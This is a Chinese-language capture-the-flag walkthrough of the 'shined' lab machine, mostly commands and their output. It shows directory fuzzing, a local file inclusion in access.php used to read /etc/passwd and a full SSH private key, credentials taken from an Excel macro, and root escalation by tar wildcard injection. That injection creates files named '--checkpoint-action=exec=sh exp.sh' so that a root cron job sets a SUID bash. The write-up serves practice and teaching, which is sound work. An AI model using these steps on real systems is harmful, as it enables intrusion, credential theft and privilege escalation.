信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.151  08:00:27:38:47:87       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f0:df:73       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.082 seconds (122.96 hosts/sec). 4 responded
❯ export ip=192.168.60.151
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.151:22
Open 192.168.60.151:80
Open 192.168.60.151:2222
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 22:34 CST
Initiating ARP Ping Scan at 22:34
Scanning 192.168.60.151 [1 port]
Completed ARP Ping Scan at 22:35, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:35
Completed Parallel DNS resolution of 1 host. at 22:35, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:35
Scanning 192.168.60.151 [3 ports]
Discovered open port 22/tcp on 192.168.60.151
Discovered open port 80/tcp on 192.168.60.151
Discovered open port 2222/tcp on 192.168.60.151
Completed SYN Stealth Scan at 22:35, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.151
Host is up, received arp-response (0.00093s latency).
Scanned at 2025-01-14 22:35:00 CST for 0s

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 64
80/tcp   open  http         syn-ack ttl 63
2222/tcp open  EtherNetIP-1 syn-ack ttl 63
MAC Address: 08:00:27:38:47:87 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

访问80端口后，发现是个太阳镜的购物平台，里面几乎都是锚点链接

扫了一下目录，没什么有用的信息

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.151
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.60.151/images/]
/privacy              (Status: 301) [Size: 318] [--> http://192.168.60.151/privacy/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.60.151/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.60.151/js/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

换了个字典，加上文件名

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.151
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.hta.html            (Status: 403) [Size: 279]
/.hta.txt             (Status: 403) [Size: 279]
/.hta.zip             (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.zip        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.zip        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/about.html           (Status: 200) [Size: 7269]
/access.php           (Status: 200) [Size: 1849]
/contact.html         (Status: 200) [Size: 8716]
/css                  (Status: 301) [Size: 314] [--> http://192.168.60.151/css/]
/images               (Status: 301) [Size: 317] [--> http://192.168.60.151/images/]
/index.html           (Status: 200) [Size: 21819]
/index.html           (Status: 200) [Size: 21819]
/js                   (Status: 301) [Size: 313] [--> http://192.168.60.151/js/]
/privacy              (Status: 301) [Size: 318] [--> http://192.168.60.151/privacy/]
/server-status        (Status: 403) [Size: 279]
/shop.html            (Status: 200) [Size: 7374]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

LFI文件读取

有个登入的页面/access.php

尝试进行Sql注入，没有注入点，可登入失败也没有回显啊❓正常来说会提示用户名或密码错误的

猜测存在LFI文件包含

尝试模糊测试，发现还真有LFI漏洞

❯ wfuzz -c -u "http://192.168.60.151/access.php?FUZZ=../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 129
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.151/access.php?FUZZ=../../../../../etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000003720:   200        88 L     164 W      3164 Ch     "inet"

尝试进行读取文件，拿到一个cifra用户

❯ curl http://192.168.60.151/access.php\?inet\=../../../../../etc/passwd
    <div>
    ……………………省略……………………
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
cifra:x:1000:1000:,,,:/home/cifra:/bin/bash
    </div>
</body>
</html>

尝试读取其他文件，拿到私钥

❯ curl http://192.168.60.151/access.php\?inet\=../../../../../home/cifra/.ssh/id_rsa
………………省略…………………………
        -----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

爆破一下私钥，哈哈，结果这个密钥没有密码

1
2
3

❯ vim id_rsa
❯ ssh2john id_rsa >hash
id_rsa has no password!

但是当我ssh连接时发现还是需要用户密码

回想起来之前有扫到一个2222端口

尝试指定端口连接

❯ ssh cifra@$ip -i id_rsa -p2222
The authenticity of host '[192.168.60.151]:2222 ([192.168.60.151]:2222)' can't be established.
ED25519 key fingerprint is SHA256:rpq/IGJ60HZMEXbZDq1zSx9/6CKFJTOTyb3ubKwwu3Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.151]:2222' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Tue Apr  9 13:53:46 2024 from 192.168.1.210
cifra@b13d359bc30b:~$ ls
contabilidad.xlsm

宏文件

有个excl文件，down下来打开看一下吧

靶机里面有python开一下http服务，结果我发现这个用户好像是在docker中

docker并没有对8000端口进行端口映射所以没法下载

我利用Ligolo-ng穿透一下吧

突然想起来直接用scp不就完事了，呆了🤣

1 2	❯ scp -P 2222 -i id_rsa [email protected]:contabilidad.xlsm . contabilidad.xlsm 100% 13KB 8.2MB/s 00:00

打开发现有个宏文件

在modulo1中发现了用户凭证leopoldo: snickers

用户提权

尝试ssh登入一下

❯ ssh leopoldo@$ip
[email protected]'s password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Tue Jan 14 03:14:36 PM UTC 2025

  System load:  0.0                Processes:                128
  Usage of /:   53.4% of 11.21GB   Users logged in:          0
  Memory usage: 19%                IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                 IPv4 address for enp0s3:  192.168.60.151

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

18 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Apr  9 14:45:36 2024 from 192.168.1.41
leopoldo@shined:~$ cat user.txt
73f5b965bd7e817a71b853f44ada19b0

再次信息收集

当我去tmp目录下，发现有备份和清理的脚本，我怀疑后台会定时运行

传个pspy64上去

发现会定时每分钟运行一下备份脚本

leopoldo@shined:/tmp$ cat backup.sh
#!/bin/bash

cd /home/leopoldo/Desktop/scripts/
tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz *
leopoldo@shined:/tmp$ wget 192.168.60.100/pspy64
--2025-01-14 15:17:41--  http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                              100%[================================================================>]   2.96M  --.-KB/s    in 0.03s

2025-01-14 15:17:41 (115 MB/s) - ‘pspy64’ saved [3104768/3104768]

leopoldo@shined:/tmp$ chmod +x pspy64
leopoldo@shined:/tmp$ ./pspy64
2025/01/14 15:18:01 CMD: UID=0     PID=3146   | /usr/sbin/CRON -f -P
2025/01/14 15:18:01 CMD: UID=0     PID=3145   | /usr/sbin/CRON -f -P
2025/01/14 15:18:01 CMD: UID=0     PID=3148   | /bin/bash /tmp/backup.sh
2025/01/14 15:18:01 CMD: UID=0     PID=3147   | /bin/bash /tmp/backup.sh
2025/01/14 15:18:01 CMD: UID=0     PID=3149   | tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz backup.tgz
2025/01/14 15:18:01 CMD: UID=0     PID=3150   | /bin/sh -c gzip

该命令使用tar命令将指定文件（backup.tgz）和目录进行打包，并使用gzip进行压缩，最终创建一个名为backup.tgz的压缩文件，保存在指定的路径中

说白了就是将/home/leopoldo/Desktop/scripts/目录下的文件打包成压缩包，放到原来的目录下，而且当前目录的权限是普通用户的

Root提权

那我们直接利用tar提权即可，但不能直接操作

我们将命令变成文件名就行了，我们写一个脚本，让/tmp/sh的sh有suid权限

leopoldo@shined:~/Desktop/scripts$ echo -e '#!/bin/bash\ncp /bin/bash /tmp/sh\nchmod +s /tmp/sh'>exp.sh
leopoldo@shined:~/Desktop/scripts$ chmod +x exp.sh
leopoldo@shined:~/Desktop/scripts$ echo "test"> '--checkpoint=1'
leopoldo@shined:~/Desktop/scripts$ echo "test"> '--checkpoint-action=exec=sh exp.sh'

查看一下进程

2025/01/14 15:40:01 CMD: UID=0     PID=3594   | /usr/sbin/CRON -f -P
2025/01/14 15:40:01 CMD: UID=0     PID=3593   | /usr/sbin/CRON -f -P
2025/01/14 15:40:01 CMD: UID=0     PID=3595   | /bin/sh -c /bin/bash /tmp/backup.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3596   | /bin/bash /tmp/backup.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3597   | tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz backup.tgz --checkpoint=1 --checkpoint-action=exec=sh exp.sh exp.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3599   | /bin/sh -c sh exp.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3598   | /bin/sh -c sh exp.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3600   | /bin/sh -c gzip
2025/01/14 15:40:01 CMD: UID=0     PID=3601   | sh exp.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3602   | chmod +s /tmp/sh
2025/01/14 15:40:01 CMD: UID=0     PID=3603   | tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz backup.tgz --checkpoint=1 --checkpoint-action=exec=sh exp.sh exp.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3604   | sh exp.sh
2025/01/14 15:40:01 CMD: UID=0     PID=3605   | cp /bin/bash /tmp/sh
2025/01/14 15:40:01 CMD: UID=0     PID=3606   | sh exp.sh

在tmp下就有个suid的bash了，正常利用就行了

leopoldo@shined:/tmp$ ./sh -p
sh-5.1# whoami
root
sh-5.1# cat /root/root.txt
01d940a42e6a3f5727e2382d9f4f3b87